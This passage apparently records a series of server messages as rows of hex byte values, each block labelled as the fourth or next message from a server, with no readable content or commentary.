0x30 0x70 0x56 0x80 0x81 0xb3 0x16 0xbd 0x66 0xd5 0x86 0x6b 0xc9 0xbd 0xd8 0x47
0x8e 0x72 0x67 0x56 0xcc 0xce 0xc0 0x14 0x00 0xab 0xc4 0x9f 0x0a 0x75 0xf1 0x1c
0x5b 0x5b 0xa6 0xaf 0x52 0x01 0xe6 0xb1 0xe9 0x24 0x10 0x9f 0x60 0xf7 0xbb 0xed
0x25 0x62 0xb6 0x3f 0x23 0x93 0xd0 0x3b 0x12 0xb6 0x03 0x33 0x7a 0xa2 0xc6 0x74
0x1b 0x6d 0x82 0x47 0x67 0x2d 0x72 0x18 0x7e 0x23 0xff 0x44 0x17 0x13 0x57 0x61
0x0d 0xb9 0xa5 0x49 0x57 0xae 0xaf 0xd2 0xf2 0xf4 0xf3 0xb9 0x42 0xf2 0x31 0xc7
0xff 0x18 0xda 0x69 0x03 0xc3 0xdf 0xae 0xe8 0xcb 0x5c 0x6c 0x25 0xd5 0xcb 0xb5
0xd3 0x82 0xdc 0x04 0xb2 0x4f 0x74 0x44 0xa8 0x80 0xe3 0x38 0x5b 0xee 0xf5 0x98
0x9e 0x32 0x33 0x19 0x96 0xf5 0xfe 0xc5 0xf5 0x12 0xab 0xf7 0x02 0xfd 0x2a 0xe6
0x0b 0xf8 0xf0 0x1f 0xce 0x72 0x49 0x07 0x49 0x3d 0xd5 0xe7 0x04 0x80 0x3a 0x5f
0xfa 0x40 0xc7 0x7f 0x02 0x2c 0xfb 0x6e 0x6d 0x9b 0x5f 0x5c 0x2e 0x3d 0xc0 0x88
0x88 0xcd 0x70 0xc0 0xd4 0xfa 0x42 0xf3 0x76 0x8f 0xa8 0x5a 0x1f 0xa6 0x65 0x33
0x51 0x3f 0xe9 0x06 0xa7 0x5c 0xf3 0x87 0xce 0x78 0xe8 0x98 0x3f 0x83 0x4e 0x97
0x44 0x12 0x43 0x61 0xc9 0x9d 0x5e 0x19 0xba 0x87 0x06 0x26 0x07 0xe1 0x0c 0xb5
0x07 0xad 0x26 0x92 0xa6 0x3b 0x93 0x94 0xd2 0x36 0x7c 0x73 0x7f 0xf8 0xdf 0x05
0x0a 0x18 0x30 0xef 0xf5 0x77 0xfa 0xab 0x09 0x71 0x48 0xc1 0xc2 0x7c 0x28 0xf9
0x1c 0x78 0x05 0x12 0xde 0x51 0x83 0xdc 0x8f 0xc9 0x88 0x15 0x60 0x5e 0xb5 0x2d
0x7f 0x65 0x97 0x3e 0xba 0x14 0x06 0x0d 0xcb 0x5a 0x2f 0x0e 0xba 0x92 0x05 0xe0
0xd8 0x87 0xb3 0x38 0x42 0xc3 

Fourth message from server:

0x81 0x2b 0xf3 0x4a 0x59 0xff 0xcb 0xd5 0x3b 0x06 0x97 0xc5 0xa9 0xa2 0x3e 0xb7
0x5a 0xc3 0x8b 0xa3 0x71 0xc6 0x86 0x15 0x82 0xb7 0x21 0x0c 0x46 0x2d 0x4e 0x70
0x1b 0x45 0x7b 0xc5 0x7c 0x92 0xe8 0x1f 0x1a 0x3a 0x2e 0xac 0x3b 0xb7 0xb2 0xa9
0x4a 0xca 0x26 0xb6 0x92 0x44 0x1b 0xe2 0xed 0x87 0x4d 0x1d 0x88 0x5d 0xe4 0x3b
0xbc 0x4b 0xc9 0xeb 0xce 0xc3 0x92 0x58 0xef 0x2d 0xf0 0x38 0x18 0xc6 0x52 0x5b
0xa0 0xf9 0x07 0x34 0xf2 0x46 0x92 0x6a 0x29 0xaa 0x4d 0xd8 0xc5 0x71 0x51 0xf9
0x6b 0x89 0x7e 0x3d 0x17 0x33 0x49 0x26 0x09 0xfb 0x57 0xa8 0xac 0x28 0x66 0x77
0xa6 0x9b 0xdc 0xbb 0xa4 0xf7 0x6a 0x2b 0x62 0x81 0x02 0xeb 0xa1 0x6e 0x57 0x13
0xe5 0xd3 0x85 0x9c 0x4c 0xd2 0xe5 0xc4 0x2b 0xe5 0x39 0x75 0xd3 0xe6 0x7a 0x8b
0xc5 0xdf 0x31 0xdf 0x58 0xd0 0xac 0xbf 0xf0 0xad 0x87 0x90 0xba 0x87 0x5f 0x21
0x86 0x6b 0x8e 0x9a 0x9c 0xa9 0x58 0xc6 0xa3 0x15 0x4f 0xec 0xb7 0x6e 0x7c 0xb9
0xb2 0x52 0xf9 0x65 0xc6 0xd5 0x4c 0xab 0x92 0x9a 0x84 0x63 0x8a 0x87 0x71 0xe0
0x39 0xa7 0x43 0xda 0x0e 0xe3 0x40 0x91 0xc9 0x9a 0xb9 0x79 0x0c 0x9e 0xbc 0xdd
0x83 0xf0 0xa2 0xde 0x85 0xb4 0x64 0x24 0x9d 0xdb 0xf0 0xcb 0xbe 0xaf 0x62 0x07
0x04 0x0b 0x08 0x65 0x89 0xc0 0x42 0xda 0x4e 0x2a 0x39 0x2d 0xbc 0xfa 0x8a 0xcc
0xc8 0xff 0x34 0x23 0xea 0x4a 0x41 0x41 0xcd 0x44 0xd3 0xfd 0x93 0x79 0xde 0xf8
0x53 0x7c 0xc5 0x2e 0x1c 0xfe 0xec 0xe5 0x7c 0xde 0x71 0x34 0x69 0xc7 0xf1 0x83
0x64 0x81 0xaa 0x42 0xb6 0xca 0xe2 0xef 0x33 0x7b 0x84 0x68 0x2d 0x49 0x01 0xc7
0xbf 0x85 0xd2 0x50 0x4c 0x1d 0x0b 0xde 0xd6 0xf0 0x31 0x6b 0xe1 

Next message from server

0x93 0x52 0xc4 0x98 0xf3 0xf1 0xe7 0x1f 0x84 0x75 0xd0 0x26 0x24 0x69 0xc6 0xc4
0x16 0x7d 0x85 0xd8 0x16 0xb5 0x26 0x46 0xcc 0x51 0x24 0xcb 0xfb 0x22 0x09 0xa3
0x72 0x67 0x54 0x7f 0xf3 0xdb 0x85 0x10 0x02 0x34 0x7b 0x47 0x06 0x6e 0xf8 0xc9
0xd7 0xc4 0xf9 0xe1 0xe8 0x96 0x2f 0x19 0x0e 0x6d 0x61 0xf2 0x9c 0x4b 0xbc 0x89
0x1c 0xa8 0xd8 0x47 0x33 0xf6 0x15 0xf2 0x76 0xc1 0x5b 0x87 0xb6 0x82 0xe5 0x48
0x43 0x92 0x02 0x21 0x46 0xec 0xa3 0xd0 0x28 0xdc 0xce 0x7b 0x63 0x05 0x7f 0xd2
0xe1 0x92 0x99 0x76 0xbb 0x40 0xb5 0x07 0x15 0x20 0x73 0x59 0xe9 0xc5 0x0a 0x6f
0x40 0x48 0x91 0x88 0x2c 0x63 0x6a 0x46 0x0d 0x1a 0x5a 0xa0 0xc5 0x36 0xd1 0x47
0x66 0x82 0x87 0x0b 0x98 0x95 0xb9 0xa2 0xf9 0x73 0x9d 0x6d 0xfd 0x84 0x25 0x1a
0x1d 0x93 0xc1 0x18 0xd0 0x72 0xb2 0x90 0xc7 0x72 0x2f 0xf7 0x1b 0x6a 0xaf 0x1f
0xbf 0x05 0xcb 0xda 0x6a 0x31 0xff 0xcf 0xfb 0x30 0x89 0xdd 0xba 0xe9 0x7f 0x6b
0xbc 0x4c 0xbd 0x6c 0x63 0x0e 0x7b 0x2b 0x2f 0x90 0xe9 0x09 0x24 0xde 0xc6 0x97
0x3f 0x19 0x2e 0x1f 0x4c 0x4a 0xe9 0xf6 0x3d 0xf3 0x01 0xba 0x28 0xaf 0xfc 0x19
0xb7 0x96 0xb8 0x8d 0xfa 0x74 0xc8 0x62 0xe0 0x7a 0xae 0xe9 0xad 0x73 0x8c 0xa1
0x56 0xb8 0xbc 0x88 0x57 0x00 0xcd 0x5b 0x96 0x09 0xfc 0x1b 0xf7 0xef 0xf1 0x0c
0x68 0xee 0x7d 0x71 0x06 0x2d 0xd9 0x5c 0xdd 0x89 0x39 0x83 0x99 0x39 0x59 0x7a
0x47 0xfe 0xd5 0xb0 0xa2 0xdb 0x2f 0x92 0x9a 0xf6 0xff 0x8d 0xe4 0x45 0x69 0xbf
0xdb 0x87 0x08 0x0f 0x23 0x28 0xb2 0xe6 0x95 0x37 0xf6 0xd6 0x8d 0xb9 0x82 0x38
0x7c 0x5d 0xd2 0x96 0xae 0x24 0xf4 0xe4 0xaa 0xf4 0x01 0xb8 0x10 0x88 0xc4 0x5a
0x9e 0xa3 0x72 0x22 0xc1 0xb5 0x11 0x65 0x69 0x92 0xfe 0x1c 0xdb 0x3e 0xdd 0xc7
0x72 0x6c 0xf6 0xe4 0x55 0xbe 0xb5 0x4b 0x3c 0x2e 0xb0 0x1c 0x62 0xd5 0x03 0x19
0xb3 0xc3 0x42 0xbe 0xf2 0x8a 0xaa 0xdc 0xb2 0xc8 0x86 0x3f 0x11 0x56 0xc0 0x7b
0x6c 0x64 0xdf 0x83 0xb1 0x71 0xa2 0x51 0xd7 0x81 0x0e 0xac 0x0f 0x65 0x3d 0x46
0xbe 0x4d 0x58 0x26 0x44 0x92 0xd0 0x65 0x2f 0xf7 0x00 0xbb 0xe0 0x39 0x95 0xac
0xb8 0xd5 0xb6 0x7a 0x02 0xf1 0xb5 0x18 0xc0 0xa3 0x62 0x79 0xee 0xe4 0x7e 0x4f
0x4b 0xa0 0x42 0x25 0x13 0xfd 0x97 0x8a 0x6b 0x57 0x79 0xc5 0x9c 0x0a 0xb0 0x04
0xcb 0x8f 0x84 0x24 0xd6 0x64 0x0d 0x46 0x0c 0x7f 0x72 0x54 0x66 0x75 0xbc 0x0d
0x3d 0x32 0xc8 0x20 0xad 0x62 0xf8 0xac 0xce 0x48 0xbc 0x82 0x14 0x36 0x49 0x5a
0x31 0x55 0x31 0x5b 0xa6 0xd8 0xfa 0xf9 0x27 0x8a 0x8a 0xf7 0x7b 0x3e 0xb6 0x19
0xbd 0xed 0xd1 0x55 0x2d 0x19 0xb0 0xf3 0x7d 0xb9 0xa8 0xd5 0x9f 0x2e 0x90 0xb1
0xcb 0xd7 0xbd 0x03 0x39 0xd8 0x1a 0x62 0x40 0xfd 0x1a 0xf0 0xca 0x63 0x70 0x0a
0x5a 0x60 0xc9 0xa1 0x5d 0x5c 0x4b 0x07 0x6d 0xcd 0xba 0xaa 0x2a 0xe7 0xbb 0xa5
0x8c 0x5e 0x56 0x54 0x2e 0x41 0xe3 0x86 0xa3 0x2e 0xeb 0x17 0x8f 0xb2 0x9c 0xca
0x68 0x08 0x07 0x05 0x83 0x4f 0x7c 0x4f 

Next message from server

0xb6 0xe3 0x4b 0x09 0xfd 0x73 0x6c 0xc0 0x95 0xbd 0x3c 0xee 0x82 0x06 0x48 0x01
0x39 0x3c 0xc5 0x06 0xc4 0x9d 0x0a 0x2c 0x68 0xe9 0x98 0x19 0x83 0xcb 0xd3 0x9f
0xd0 0x7c 0x7e 0x60 0xeb 0x37 0x0c 0x7d 0xfa 0xd6 0xe8 0x70 0x1c 0xbf 0xb8 0x90
0x68 0x23 0x4f 0x99 0x33 0xdf 0x10 0xfd 0x08 0x7b 0x93 0xe5 0xe8 0x74 0x39 0xd7
0xa9 0x3b 0xc6 0x99 0xae 0xcf 0x23 0xfb 0xea 0x80 0x9a 0xfe 0x88 0x32 0x4e 0x61
0x2b 0xfa 0x4c 0x01 0x73 0xdb 0xc4 0x77 0x6a 0xff 0x5b 0x73 0x31 0x4e 0xdc 0x7b
0x54 0xc5 0x58 0xa2 0x81 0xcb 0x49 0x5f 0x34 0x9d 0xf6 0xea 0x71 0x74 0x48 0x0c
0xf7 0xc0 0xa7 0x1a 0x38 0x1a 0x1f 0xf1 0x40 0x29 0x54 0xd3 0x50 0x8f 0xd7 0xec
0xa9 0x17 0x83 0xb4 0x85 0xeb 0xb1 0x32 0xc7 0xa5 0xda 0xb1 0xe8 0x61 0x97 0x2e
0x59 0xd3 0xf0 0x28 0x86 0x3a 0x18 0xd7 0x65 0xd5 0xdf 0x87 0xa1 0x7c 0xef 0x35
0x51 0xf2 0xcb 0xbe 0x58 0xb3 0x39 0xa7 0xd6 0x74 0xdd 0xc8 0xa4 0xf7 0x94 0xe0
0xdf 0xbc 0x9a 0x97 0x75 0x32 0xc6 0x2c 0xe3 0x41 0x93 0x3b 0xa1 0xf4 0xa9 0xc6
0x8f 0x30 0xc8 0xdc 0x54 0x23 0xc7 0x6e 0x4d 0x3e 0x83 0xcd 0xbe 0x53 0x9c 0xa8
0x31 0x7c 0x21 0x17 0x58 0xad 0x88 0x75 0x59 0x21 0xd3 0x63 0x2a 0xcb 0x11 0x5b
0xff 0x32 0x1a 0x10 0x1c 0x43 0xd7 0x12 0x09 0x2b 0xff 0xb9 0xa1 0x6c 0x87 0xda
0xb9 0x3a 0x2e 0xc6 0xfa 0x8d 0x8e 0x2c 0xc9 0xab 0x1c 0xad 0x21 0xf2 0xc1 0xe6
0x11 0x63 0x68 0x89 0xad 0x29 0x1f 0x42 0xed 0x39 0x79 0x88 0x58 0x4c 0xd0 0xc7
0x65 0xdf 0x9d 0x10 0xc2 0x91 0xd1 0x67 0xf0 0x48 0x19 0x88 0x14 0xbe 0xf4 0x88
0xb1 0xe2 0xde 0x2e 0x84 0x1d 0xcf 0x95 0xd4 0x9c 0xc8 0xa9 0xfa 0xac 0xfc 0xe0
0x5f 0x24 0xd4 0x2a 0xd3 0x44 0x20 0x2d 0x20 0x39 0x43 0x3d 0xd0 0x12 0xe5 0xf3
0xb1 0x22 0x96 0x5d 0xa1 0xa2 0x3c 0xa2 0x28 0xf3 0x87 0x4e 0x13 0xea 0x36 0x77
0xe0 0x65 0xc8 0xba 0x82 0xe7 0xfc 0x3d 0xe6 0x42 0x95 0xf6 0x29 0x78 0x58 0x7e
0x37 0x42 0x7e 0x5f 0x5a 0xaa 0x1c 0x37 0x1a 0x10 0x69 0x5c 0x90 0x4f 0xbe 0xc3
0x19 0xe1 0x6d 0xcc 0xaf 0x30 0x9c 0x75 0x2e 0x8d 0xc5 0x7c 0x14 0x7b 0x7a 0x17
0x87 0xd4 0xdd 0x7e 0xc4 0xc5 0xb6 0x78 0x1a 0x56 0x15 0x51 0xe1 0x7e 0xb3 0x8a
0xad 0x7e 0x9f 0x9d 0x12 0xcd 0x66 0x51 0x0d 0x6f 0x36 0x49 0x34 0x3b 0x1f 0x2e
0x24 0x3d 0x71 0xf2 0xd3 0x65 0x41 0x70 0x82 0x93 0x98 0x21 0x70 0x40 0x6a 0x7c
0x13 0xd5 0x7c 0xe6 0x1b 0x9e 0x67 0x24 0x21 0x1e 0xcb 0x59 0xa1 0xd9 0xe4 0xdf
0x66 0x29 0xd9 0xf3 0x8d 0x8a 0xc6 0x6f 0x34 0xb2 0xaa 0x45 0xe8 0xf6 0x1f 0x59
0x18 0xec 0x15 0xb3 0xe1 0xae 0xe4 0xd2 0x40 0x78 0xb6 0x95 0x2a 0xf4 0xe3 0x41
0x9a 0x4c 0x1c 0xee 0x8b 0x82 0x83 0xb0 0xde 0x47 0x94 0xa2 0x7f 0x0c 0x63 0xd0
0xd2 0x35 0xc1 0x23 0x1f 0x5d 0x4c 0xeb 0x6f 0x74 0xac 0xad 0xb1 0xae 0x4f 0x89
0x8b 0x50 0x4c 0x62 0x7d 0x31 0x01 0xa5 0x0a 0x79 0x2b 0x3f 0x03 0xa0 0x1e 0x4e
0xfc 0x34 0xff 0x09 0xce 0xa0 0x88 0x27 

Next message from server:

0x4f 0x8d 0xb9 0xf5 0x24 0xb7 0xeb 0x32 0x12 0x01 0x58 0x88 0x35 0xec 0xc6 0x22
0x75 0x59 0x21 0xe1 0xa9 0x54 0x69 0x19 0x2b 0xc4 0x42 0xb5 0xe5 0x0f 0x8c 0x86
0xb3 0x35 0x7b 0xa2 0x91 0x8e 0x29 0x94 0x4a 0x9d 0xa2 0x1e 0x1a 0x96 0x71 0xbe
0xe7 0x77 0xad 0x5f 0x45 0xf6 0x8a 0x56 0x89 0xf0 0x61 0xdc 0x88 0x9f 0xde 0xc4
0x2e 0x34 0x3a 0x89 0x6d 0x38 0x5f 0xc4 0x99 0x5c 0x4e 0x5f 0x9e 0x44 0xe4 0x10
0x61 0x1e 0x27 0x8d 0x6b 0x0f 0x4c 0x63 0x5f 0x45 0x81 0x23 0x37 0x33 0x8e 0x36
0xd8 0x26 0x79 0x7c 0x20 0xd8 0xc1 0x90 0xd8 0x22 0x47 0x25 0x3b 0x97 0x58 0xa5
0xdd 0xaa 0xdf 0x71 0xdb 0xe7 0x96 0x6c 0x0f 0xb7 0xcb 0x39 0x0f 0x1d 0x59 0x82
0xb4 0xb1 0xf8 0xb7 0x7c 0xcd 0xd9 0xa2 0x93 0x8d 0xc1 0x02 0x37 0x19 0xc8 0xa3
0x65 0x2b 0x99 0x3b 0x0e 0x0b 0x3e 0x4b 0xb7 0x28 0xaf 0xf4 0xac 0xb6 0xfd 0xc6
0x37 0x8d 0x82 0x1a 0x1c 0x68 0xdf 0x09 0x48 0x9b 0x07 0xd7 0x3c 0xdb 0xb3 0x7f
0x01 0xf6 0x10 0xb1 0xb3 0x24 0x71 0xb0 0xc6 0xdb 0x8b 0x1a 0x28 0xc1 0xbb 0x17
0x73 0x1f 0xe7 0xba 0x45 0xa7 0x96 0x70 0xa3 0x7d 0x20 0xfd 0xff 0x37 0xfb 0x7f
0x72 0x7f 0xe5 0x86 0x06 0xde 0x6a 0x62 0xe0 0x70 0x0a 0x61 0x02 0xac 0x87 0xd0
0x52 0x6f 0x70 0xb9 0x17 0x47 0x7b 0x8d 0x9b 0x2d 0xa4 0x1b 0x3a 0x42 0x52 0x7c
0x46 0xdf 0x25 0x42 0x2e 0x65 0x5c 0x13 0x1c 0x42 0x98 0xc0 0x4c 0xf1 0x36 0x2c
0x79 0xb7 0x32 0x66 0xf5 0xb3 0x15 0x3d 0xee 0xf3 0xc8 0xd4 0x7a 0xf9 0xbe 0x5c
0xc2 0x52 0xf8 0xc2 0x2b 0xaf 0x45 0x18 0xde 0xe7 0x52 0xb4 0x66 0x60 0x3b 0x17
0x4f 0x53 0x35 0xa6 0x29 0x5a 0x3d 0x0a 0x6e 0x46 0x8d 0xaf 0x31 0x82 0x96 0x99
0xf2 0x30 0x37 0x53 0x6b 0xf5 0x8e 0x9d 0x76 0x9c 0x52 0x20 0x89 0x67 0x72 0x46
0x1a 0xd3 0x76 0xb9 0x4d 0x87 0xcf 0xd8 0x2f 0x00 0x1b 0x20 0x19 0xa6 0x10 0xc8
0x65 0x44 0x5e 0xab 0x10 0x51 0x14 0xdc 0x16 0xef 0x89 0x28 0xd8 0x5e 0x52 0x02
0xc8 0x62 0xbc 0xad 0x8d 0x65 0x7f 0x0f 0xae 0x75 0x62 0x6c 0xa7 0x40 0x02 0x6c
0x9d 0xd4 0x60 0x60 0x3e 0x78 0x4b 0xbb 0x52 0xfc 0xf4 0x29 0xe0 0xac 0x0f 0x9f
0xd8 0x01 0x5d 0xfb 0x99 0xfa 0xa4 0x7c 0xd1 0x19 0xb9 0xdd 0x56 0xb5 0x93 0xee
0x6d 0x2f 0xf7 0x6e 0xd2 0xc9 0xd8 0xcb 0x32 0x39 0xe0 0xa8 0xa6 0x6f 0x7a 0xc2
0xf3 0xce 0x62 0x7a 0x14 0x46 0xbd 0xad 0xed 0x9f 0x26 0xfb 0x22 0x3b 0x2c 0x29
0x81 0x6b 0x4f 0x8d 0xef 0x99 0x5c 0xb1 0x15 0x09 0xd3 0x27 0x92 0xc6 0x38 0xb2
0x1a 0xb5 0x7b 0x06 0x98 0x70 0x99 0x36 0xb6 0x43 0xc0 0x5a 0x88 0x41 0xe5 0x90
0x66 0x83 0xee 0x29 0xf4 0x51 0xba 0x24 0xdc 0x59 0x56 0x42 0xea 0x4e 0x27 0xf8
0x9b 0x4f 0x66 0x5f 0x12 0xb1 0x46 0x2e 0x5c 0x81 0x34 0xb8 0xf7 0x50 0xd2 0x9d
0xba 0x33 0x09 0x1c 0xdd 0x60 0x46 0x97 0x12 0xe3 0x63 0xad 0xf7 0xfb 0x6e 0x1c
0x2a 0x51 0xc7 0xe7 0xc6 0xbc 0x0f 0x7a 0x3b 0xb2 0xe8 0x2d 0x90 0xcc 0xac 0xa6
0xa5 0x6f 0x38 0x63 0x80 0xf8 0x39 0xf4 

Next message from server:

0x88 0x69 0x56 0x44 0xb6 0x32 0xa3 0x81 0xb7 0x64 0x07 0x32 0xe3 0xe3 0x2e 0x76
0x1a 0x1d 0x39 0x82 0x71 0x24 0xf8 0xe9 0xfe 0x94 0xa3 0xa7 0xfc 0xba 0xce 0x6e
0x18 0xe3 0xa9 0x10 0x7a 0x85 0x35 0xc2 0x72 0xe5 0x90 0x07 0x2e 0x18 0xcb 0x3d
0x4b 0xea 0xb4 0xd8 0xe5 0x10 0xc9 0x65 0xa6 0x5a 0x11 0xfa 0x17 0x73 0x36 0xb1
0x7e 0x83 0x3a 0xc7 0x5b 0x16 0x28 0x42 0x4a 0xc9 0x43 0x58 0xd5 0x3a 0x51 0x4b
0xb0 0xf6 0x91 0x58 0xc7 0xaf 0x8e 0x0a 0xae 0x5d 0xcd 0x52 0xb6 0x8f 0xf7 0xa1
0x02 0x8e 0xb8 0x58 0xbd 0xeb 0xff 0x60 0xa0 0xa7 0xe7 0xce 0x59 0x91 0xdd 0x31
0xb9 0x0e 0xf6 0x83 0x82 0x6d 0x17 0x0a 0x62 0x6a 0xcd 0x62 0x38 0x18 0xc5 0x99
0xf3 0x2e 0x35 0x91 0x04 0xef 0xa0 0x10 0x61 0x15 0x77 0x4a 0xef 0xf0 0xd2 0xce
0x27 0xa8 0x6a 0xb0 0xd0 0xea 0x9e 0x18 0x60 0x0b 0x94 0xf7 0xf3 0x49 0x50 0x8d
0x7e 0xf6 0x2b 0x84 0x5a 0x31 0x35 0x82 0x72 0xd9 0x6a 0x24 0x05 0x1e 0xa0 0x34
0xab 0xb1 0x74 0x7f 0x6d 0x50 0x0f 0x58 0x91 0xce 0x86 0x89 0x64 0xa7 0xc4 0xc1
0xd9 0xf3 0x47 0xea 0x4d 0x8b 0x1d 0xe1 0xe4 0xdf 0xba 0x72 0xd1 0x4e 0x52 0x95
0x30 0x5a 0x88 0x76 0xb4 0xc4 0xf4 0x4b 0xbe 0x10 0xca 0x52 0x66 0x02 0x7a 0x15
0x9a 0xd1 0x6e 0x70 0x00 0x24 0x87 0xe3 0x0b 0x6b 0xff 0x6d 0x71 0x7e 0x14 0x88
0x6b 0xf6 0xd8 0x32 0x63 0x53 0x89 0x91 0xe0 0xde 0x58 0x25 0x5e 0x3a 0x9f 0x28
0x38 0x44 0x1b 0x67 0x78 0x76 0x52 0x98 0x3d 0x19 0x25 0x82 0xe5 0x95 0x27 0xe8
0x62 0xac 0x05 0x02 0xcd 0x7b 0x7f 0xf1 0x76 0xff 0x24 0x4e 0x8f 0x50 0x26 0xef
0xfc 0xa4 0x9f 0x65 0x91 0xa5 0x35 0xbb 0x91 0xdc 0xb4 0xaf 0xa8 0x23 0xf7 0x62
0x48 0x14 0xb6 0x38 0x84 0x81 0x48 0x24 0xaa 0x39 0x4c 0x8f 0x1a 0x99 0xd1 0x1e
0xff 0x22 0x43 0x7c 0x1c 0x70 0xdd 0xd9 0x07 0x30 0x8d 0xb5 0xa3 0x26 0xe2 0x10
0xf1 0xa8 0x27 0x1c 0x3e 0x9f 0x17 0xc9 0x9e 0x95 0x10 0xc7 0x7c 0xb4 0x5f 0x54
0xe6 0x60 0x1b 0xe6 0xe6 0xb0 0xe1 0x2e 0x51 0x08 0x1c 0x26 0x31 0xb1 0x93 0xa6
0x9f 0x13 0xac 0xc6 0x3c 0x54 0x97 0xa3 0xc0 0xb8 0x50 0x83 0x32 0xc8 0xc2 0x16
0x43 0x53 0x15 0x4e 0x9f 0x69 0x19 0xec 0x68 0x22 0xf9 0x13 0xb2 0x19 0x48 0xf9
0xd3 0x31 0x92 0x90 0xe4 0x14 0xaf 0xf8 0xd5 0xcd 0x51 0xaf 0xe3 0x5b 0x39 0x42
0x82 0xb1 0x61 0x98 0x73 0x9b 0xa0 0x27 0xdb 0xde 0x1b 0x3a 0x2f 0x8f 0x67 0xd3
0x63 0x17 0x25 0xf7 0x6c 0x78 0x2c 0xd0 0x35 0xa5 0x61 0x68 0x21 0x48 0x51 0x46
0x78 0x29 0x6b 0x6c 0x88 0x6b 0x0e 0x40 0x67 0xb8 0x17 0xfc 0xff 0xdc 0x6f 0x6a
0x5a 0xe6 0x9f 0xcc 0x4b 0x4e 0xe5 0xcc 0x87 0xcf 0x15 0xe4 0x5f 0x27 0xcc 0xd1
0x37 0x77 0xde 0x6e 0xd1 0x21 0x32 0x44 0x41 0xdb 0x0c 0x6f 0xa6 0x7f 0xa8 0xb8
0xc1 0xbd 0xcc 0xa7 0xc0 0x0f 0x64 0x77 0x5f 0x58 0x54 0x1f 0x1e 0x60 0x9f 0x93
0xbf 0x1b 0x6a 0x04 0xe1 0x61 0x16 0xc2 0xc3 0x1c 0xaf 0xf1 0xb5 0x05 0xed 0xba
0x93 0x78 0x05 0xe3 0xae 0x5c 0xfd 0xa9 

Next message from server:

0x96 0x58 0x8d 0x06 0xc9 0xae 0x53 0x95 0x00 0x18 0x6f 0xf5 0x0e 0xae 0x74 0xdf
0x7a 0xe0 0xeb 0x0e 0x73 0x4a 0xe0 0x87 0x7b 0x1a 0xd5 0x1b 0x92 0x41 0x16 0x81
0xef 0xc4 0x5b 0x57 0x3a 0x37 0x8d 0xf3 0xd5 0x4b 0xee 0xdb 0x5b 0x79 0xa0 0xb5
0xcd 0x88 0x4d 0x9d 0x17 0x3b 0xae 0xe2 0xf2 0xbd 0x17 0xa2 0x2c 0xf7 0x30 0xb4
0x50 0xed 0xa1 0x5a 0x61 0x50 0x8a 0x9c 0xb4 0xd8 0xd9 0xfa 0x08 0x26 0xa3 0xfc
0x9e 0xcd 0x69 0x2f 0xd2 0x6d 0x47 0x41 0xcf 0x3d 0x83 0xa1 0xe9 0x3d 0x53 0x94
0xf1 0x0d 0xd5 0x10 0x25 0xcb 0x1f 0xaa 0x0b 0x6b 0x17 0x09 0x8f 0x8d 0x37 0x64
0x5b 0x92 0x74 0xed 0x7b 0x58 0x12 0x39 0xf6 0x00 0x68 0x82 0xd3 0x06 0xc6 0xff
0xaf 0xe8 0x49 0x89 0xae 0x10 0x48 0xc2 0x48 0xfd 0x17 0x35 0x4a 0x03 0x89 0x9c
0x25 0x9f 0x05 0xa7 0x73 0x16 0xaf 0xde 0xd9 0x65 0xf2 0xc8 0x25 0x08 0x6e 0x38
0x52 0xc7 0xa0 0xd6 0xf3 0xe7 0xab 0x48 0xa3 0x6c 0x13 0xa0 0x76 0x64 0xee 0x6f
0x3f 0xfd 0x61 0xda 0x1a 0x15 0x20 0xbd 0xa7 0xf9 0x92 0xe5 0xae 0x6e 0x43 0xb4
0xda 0x46 0xdc 0xc5 0x7b 0x12 0x9c 0xb0 0x78 0x55 0x6b 0x69 0x41 0xfd 0xec 0x20
0x25 0x51 0xc6 0xf4 0x4b 0x17 0x24 0x27 0x8a 0x07 0xaa 0x14 0x6a 0x2e 0x67 0x94
0xc3 0xaa 0x16 0x38 0x1c 0x4d 0x57 0x38 0x4a 0x43 0xc6 0x96 0xa3 0x44 0x6a 0xee
0xe2 0x80 0x08 0x36 0xe2 0xf5 0xf8 0x64 0xe5 0x91 0x75 0x81 0xbe 0xbc 0xd0 0x2b
0x59 0x48 0xd9 0x65 0x79 0xa4 0x16 0xc9 0x8f 0xe4 0xb4 0x9d 0xc8 0xaf 0x2d 0xce
0xfa 0xfb 0x36 0x83 0x5c 0xb2 0xd4 0x10 0x2c 0x86 0x1b 0x8d 0x4d 0xdf 0x35 0xcf
0x11 0x77 0x61 0x3c 0x73 0x7d 0xbd 0xf0 0x37 0xcc 0xf0 0x66 0x31 0x69 0x96 0x02
0x10 0x1c 0x9e 0x31 0x6f 0xd2 0x4e 0x7f 0x31 0x8e 0x9e 0x5f 0xec 0x68 0x86 0x48
0xeb 0x46 0x5b 0x37 0x87 0xe0 0xcc 0xa1 0x68 0x6c 0x39 0x11 0x34 0x69 0x5d 0x27
0x0e 0x15 0xa5 0xbe 0xf0 0xdd 0xed 0xce 0x4e 0x33 0x8e 0x43 0x55 0xcf 0x7c 0x15
0x3d 0x6e 0xe4 0x63 0x5c 0x35 0xc3 0x7a 0x3f 0xde 0xa0 0xb3 0xeb 0xa1 0xd7 0x34
0xd5 0x0b 0x3d 0x66 0xc5 0x3a 0x20 0x64 0xaf 0x61 0xcb 0xa1 0x44 0x6c 0x72 0x52
0xbd 0x68 0xbb 0xb1 0x7a 0x3b 0x58 0x47 0x0b 0x85 0x76 0xeb 0x8c 0x78 0xf9 0x16
0xfc 0x87 0x71 0x2e 0x80 0x4e 0xb9 0x99 0x1b 0x3b 0xe1 0x3c 0x47 0xa7 0x39 0x85
0xf2 0x3e 0xdf 0x84 0x19 0xcc 0xaa 0xb4 0xd0 0x2e 0xd2 0x86 0x1c 0x17 0x8a 0xca
0x5d 0x84 0x46 0x0b 0x32 0x46 0x9a 0xf6 0xe2 0x72 0x28 0xcb 0xfb 0x25 0xb7 0xad
0x65 0x84 0x94 0x15 0x5b 0x25 0x2a 0xe1 0x65 0x14 0x01 0x13 0xee 0x2f 0x05 0x6c
0xf8 0xc6 0xf9 0xd1 0x45 0x46 0xac 0xf9 0x08 0x4b 0x79 0xe2 0x73 0xc8 0x7d 0x8c
0x81 0x66 0x54 0xf0 0x76 0x34 0x84 0x30 0xb0 0xf6 0xb3 0x15 0xe0 0x59 0xbc 0x57
0x91 0xea 0xa8 0xaf 0x35 0x5f 0x27 0x28 0x3b 0x58 0xc9 0x8d 0x76 0x00 0xf3 0x10
0xe2 0x33 0x70 0xad 0x5e 0x34 0x9e 0xa9 0x49 0x98 0x06 0xbd 0x57 0xa9 0x79 0x02
0xf7 0xf2 0xf3 0xcc 0xad 0x26 0xa2 0x63 0x4f 0x43 0x12 0xc8 0x51 0xd0 0xac 0xb8
